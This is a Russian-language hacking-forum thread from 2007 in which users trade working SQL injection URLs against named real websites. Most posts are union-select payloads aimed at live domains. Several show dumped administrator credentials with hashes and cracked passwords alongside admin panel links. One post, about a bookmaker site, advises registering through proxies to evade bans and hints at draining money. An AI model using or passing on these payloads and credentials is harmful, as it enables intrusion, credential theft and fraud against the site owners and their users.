ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1191  
Старый 21.03.2007, 18:24
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
Провел на форуме:
1668307

Репутация: 114
Отправить сообщение для [aywo] с помощью ICQ
По умолчанию

Код:
http://www.vesnaupi.ru/cross/gallery.php?dep=4&gal=4&pos=&id=-1+union+select+1,2,3,4,5,6,7,8,9,10/*
 
Ответить с цитированием

  #1192  
Старый 21.03.2007, 18:32
freddi
Постоянный
Регистрация: 05.07.2006
Сообщений: 458
Провел на форуме:
2943499

Репутация: 807
По умолчанию

www.bukmekers.com
Букмекерская контора

Код:
http://bukmekers.com/index.php?option=com_user&task=doStakeMenu&cid=-1+union+select+1,concat(database(),char(58),user(),char(58),version())+from+INFORMATION_SCHEMA.TABLES/*
1) Скуля действует только от зарегестрированного пользователя;
2) Регестрируйте юзера только под проксями));
3) Имена таблиц ищите только под проксями;
4) Ваш акк могут через какое-то время забанить, ну потом зареганите другой));
5) Далее, как деньги слить думаю разберетесь.

Удачи.
 
Ответить с цитированием

  #1193  
Старый 21.03.2007, 18:45
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

mssql

Код:
http://www.stud-info.com/shop/ozon/book/zakaz.asp?id=-1+union+all+select+1,2,3,4,5,6,table_name,8,9,10,11+from+information_schema.tables--
mysql

Код:
http://www.vtv.gcg.ru/konkurs/?konkurs=-1+union+select+1,2,3,4,5,6,7,8,concat(database(),char(58),user(),char(58),version())/*
 
Ответить с цитированием

  #1194  
Старый 21.03.2007, 19:03
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

Код:
http://www.onlineflashgamez.com/index.php?action=playgame&gameid=-1+union+select+1,concat_ws(0x3a,username,password,emailaddress),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+0,1/*
admin:dbc50ecb629ac64cc2fdad7bede9daf2: onlineflashgamez@gmail.com

dbc50ecb629ac64cc2fdad7bede9daf2 = 1qa2ws
http://www.onlineflashgamez.com/admin/index.php

Последний раз редактировалось n1†R0x; 21.03.2007 в 19:08..
 
Ответить с цитированием

  #1195  
Старый 21.03.2007, 19:13
Constantine
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
Провел на форуме:
7192869

Репутация: 3033


По умолчанию

Код:
http://state.rin.ru/cgi-bin/news.pl?id=-118107+union+select+1,2,concat_ws(char(58),name,login),4+from+users/*
вот тут с табличкой пришлось напрячься=\
Код:
http://shop.vashtextil.com.ua/main.php?id=-7'+union+select+1,id,3,4+from+tbl_main/*
__________________

Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!

з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
 
Ответить с цитированием

  #1196  
Старый 21.03.2007, 19:35
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

telemir.com.ua

Код:
http://telemir.com.ua/news/news.html?id=-1+union+select+1,2,concat(user_name,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+from+users/*
Admin:Admin мда...


http://telemir.com.ua/admin - убогейшая, вообще ничего нету =(
 
Ответить с цитированием

  #1197  
Старый 21.03.2007, 20:12
n1†R0x
Постоянный
Регистрация: 20.01.2007
Сообщений: 787
Провел на форуме:
2924346

Репутация: 1719


Отправить сообщение для n1†R0x с помощью ICQ
По умолчанию

dorian.ru
Код:
http://www.dorian.ru/catalog/dog.php?screen=1&id=-1+union+select+concat(name,0x3a,password),2,3,4,5,6+from+users+limit+0,1/*
admin:e10adc3949ba59abbe56e057f20f883e
upd: pass=123456

Последний раз редактировалось n1†R0x; 21.03.2007 в 20:19..
 
Ответить с цитированием

  #1198  
Старый 21.03.2007, 20:32
Ksander
Постоянный
Регистрация: 21.06.2006
Сообщений: 931
Провел на форуме:
4836047

Репутация: 930


По умолчанию

gostudy.com.ua

нимагу больше =((

Код HTML:
Error in query The used SELECT statements have a different number of columns
Код:
http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*
 
Ответить с цитированием

  #1199  
Старый 21.03.2007, 20:50
}{0TT@БЬ)Ч
Постоянный
Регистрация: 20.01.2006
Сообщений: 302
Провел на форуме:
3536885

Репутация: 447
По умолчанию

Цитата:
Сообщение от Ksander  
gostudy.com.ua

нимагу больше =((

Код HTML:
Error in query The used SELECT statements have a different number of columns
Код:
http://gostudy.com.ua/view.phtml?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102/*
вот, немножко в другом месте
вывод в title http://gostudy.com.ua/forum.phtml?theme_id=-61+union+select+database()+from+users/*
 
Ответить с цитированием

  #1200  
Старый 21.03.2007, 20:52
Grey
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503

Репутация: 5826


По умолчанию

Так и не подобрал таблицу с пользователями(

Код:
http://books.inmsk.ru/full_descript.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,convert(database(),char),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57/*
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ